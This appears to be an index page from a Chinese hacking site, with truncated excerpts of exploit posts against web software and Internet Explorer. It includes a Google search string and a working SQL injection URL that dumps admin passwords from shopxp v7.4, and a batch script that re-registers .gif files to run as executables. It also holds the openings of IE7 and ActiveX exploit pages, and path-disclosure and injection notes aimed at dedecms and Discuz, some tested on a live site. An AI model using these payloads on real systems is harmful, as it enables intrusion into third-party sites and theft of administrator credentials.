刚登陆到google阅读器，瑞星就提示有木马攻击，内容如下：

瑞星软件拦截到木马网站攻击。
木马网址：http://www.google.com/reader/view/推荐您使用AN456安全网址站进行网站导航
攻击通道：iexplore.exe  详细信息
 
攻击说明： 该网站试图将木马病毒植入您的电脑。
...

任意文件当做木马来运行

更改exe为gif：
@echo off
color 1A
ECHO Windows Registry Editor Version 5.00>gif.reg
ECHO [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.gif]>>gif.reg
ECHO "Content Type"="application/x-msdownload">>gif.reg
...

今天在中国站长网发现一个今天更新的程序，这程序是2009-12-10 13:05:53一点钟更新的，到我现在写这文章为止20.15分已经有云起企业建站系统CommonSite下载地址(已被下载8699次) 那么大的下载量了，我觉得这程序应该可以吧，后初步分析一下，这程序问题较大,
下面是该程序下载地址http://down.chinaz.com/soft/22462.htm
...

漏洞版本：shopxp网上购物系统 v7.4
关键词：inurl:shopxp_news.asp
shopxp_news.asp
暴密码的语句：
/TEXTBOX2.ASP?action=modify&news%69d=122%20and%201=2%20union%20select%201,2,admin%2bpassword,4,5,6,7%20from%20shopxp_admin
 

...

偶然路过一个php的站，由于自己很少对PHP有研究所以马虎的看了看是phpaaCMS ，不是大型的CMS，习惯性的在后面加了个“'”，没想到爆错了！

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1

//您已经在您的SQL语法错误，检查手册，对应于你的MySQL语法的正确使用服务器版本附近'\ ''行1

国内首例引导型病毒，没有文件、没有启动项、没有进程。杀软无法查杀。
 

<script language="javascript">
if(navigator.userAgent.toLowerCase().indexOf("msie 7")==-1)location.replace("about:blank");

function sleep(milliseconds)
{
var start=new Date().getTime();

...

该漏洞存在于ActiveX控件中.
攻击者可以构造恶意页面诱使用户访问，恶意代码可运行任何Windows命令，消耗大量内存，导致访问者IE浏览器崩溃。

测试代码

<html>
<title>cnhackerx@163.com</title>
<head>
<script type="text/javascript">
function sucks()
...

首发：红科网安
作者：Amxking
漏洞程序：dedecms5.5
测试对象：织梦网CMS官方网站
提交时间：2010-03-17
漏洞类型：信息泄露
危险等级：低

漏洞描述：

dedecms 5.5程序泄露网站路径信息。

测试地址：

http://www.dedecms.com/plus/paycenter/alipay/return_url.php
...

在最新的discuz! 7.2中自带了一个新的应用程序插件manyou。恰恰在这个新插件中，没有对传入的参数进行检查，在GPC为off的情况下，导致注入漏洞的产生。
...